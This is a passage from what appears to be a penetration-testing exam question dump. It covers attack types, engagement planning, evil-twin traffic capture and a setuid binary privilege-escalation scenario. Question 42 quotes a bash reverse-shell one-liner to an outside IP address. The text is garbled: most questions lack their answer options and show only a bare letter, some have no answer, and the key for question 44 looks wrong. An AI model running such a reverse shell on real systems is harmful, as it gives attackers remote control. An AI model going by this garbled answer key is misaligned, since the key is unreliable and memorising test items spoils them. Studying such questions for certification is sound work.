
A. Command injection attack
B. Clickjacking attack
C. Directory traversal attack
D. Remote file inclusion attack
Correct Answer: B

QUESTION 41
Which of the following are MOST important when planning for an engagement? (Select TWO).

QUESTION 42
The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does? A

QUESTION 43
Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of? D

QUESTION 44
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
A. Disable the network port of the affected service.
B. Complete all findings, and then submit them to the client.
C. Promptly alert the client with details of the finding.
D. Take the target offline so it cannot be exploited by an attacker.
Correct Answer: A

QUESTION 45
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal? A

QUESTION 46
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled "changepass."
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using "strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?
